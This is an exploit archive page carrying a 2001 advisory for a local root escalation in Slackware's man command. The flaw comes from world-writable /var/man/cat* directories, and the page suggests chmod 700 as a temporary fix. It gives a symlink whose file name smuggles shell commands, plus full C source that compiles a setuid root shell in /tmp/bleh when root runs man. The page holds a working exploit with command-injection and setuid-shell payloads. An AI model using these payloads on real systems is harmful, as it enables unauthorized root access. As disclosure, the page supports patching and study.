slackware.man.c

slackware.man.c: Posted Jul 18, 2001; Authored by Zen-Parse, Josh, Lockdown; Slackware 8.0 and below ships with /var/man/cat* chmodded 1777, making it vulnerable to symlink attacks. This exploit creates a suid shell with the UID of the user running man.; tags | exploit, shell; systems | linux, slackware; SHA-256 | 0fb25cf68a4fba71eceef2ca23db4efbe592af7e1416b2d13051e5e4b6990a46; Download | Favorite | View

slackware.man.c

The following advisory was sent to slackware July 11th, 2001, they failed
to respond so I hope the temporary patch will make do:

Submitted by  : Josh (josh@pulltheplug.com), lockdown (lockdown@lockeddown.net)
                zen-parse (zen-parse@gmx.net)
Vulnerability : /usr/bin/man
Tested On     : Slackware 8.0 and before.
Local         : Yes
Remote        : No
Temporary Fix : chmod 700 /var/man/cat*
Target        : root or any other user that uses man
Greets to     : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,
                slider, cryptix, s0ttle, xphantom, qtip, Sultrix, Defiance,
                Insane, rusko, falcon-networks.com.
See also      : http://www.securityfocus.com/vdb/?id=2815



        Slackware 8.0 and previous issues of Slackware are released with
/var/man/cat*/ chmod 1777:

drwxrwxrwt 2 root root 4096 Jul 11 11:03 cat*/

Since these directories are world writeable we can create symlinks there
like so:

`ln -s "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.
;script;man.7"
/var/man/cat7/man.7.gz`

When `/usr/bin/man man` is executed by root, it will create
/var/man/cat7/man.1.gz.  The symlink forces it to create a file in
/usr/man/man7 named:
"/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;exportPATH=.;
script;man.7.gz."

/usr/bin/man will then execute /tmp/script which contains:

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <errno.h>

int main()
{
  FILE *fil;
  mode_t perm = 06711;

  if(!getuid()) {
    fil = fopen("/tmp/bleh.c","w");
    fprintf(fil,"%s\n","#include <unistd.h>");
    fprintf(fil,"%s\n","#include <stdio.h>");
    fprintf(fil,"%s\n","int main() {");
    fprintf(fil,"%s\n","setreuid(0,0);setregid(0,0);");
    fprintf(fil,"%s\n","execl(\"/bin/su\",\"su\",NULL);");
    fprintf(fil,"%s\n","return 0; }");
    fclose(fil);
    system("/usr/bin/gcc -o /tmp/bleh /tmp/bleh.c");
    unlink("/tmp/bleh.c");
    chmod("/tmp/bleh", perm);
  }
   execl("/usr/bin/man","man","/usr/man/man7/man.7.gz",NULL);
   return 0;
}

With the above code compiled in /tmp/script, if root were to run `man man`, a
suid shell would be left in /tmp/bleh.

Top Authors In Last 30 Days

Red Hat 267 files
indoushka 178 files
Jay Turla 150 files
Ubuntu 74 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 24 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,125)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,591)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,312)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,885)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,861)
UNIX (9,458)
UnixWare (188)
Windows (6,772)
Other

slackware.man.c

slackware.man.c

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

slackware.man.c

Share This

slackware.man.c

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems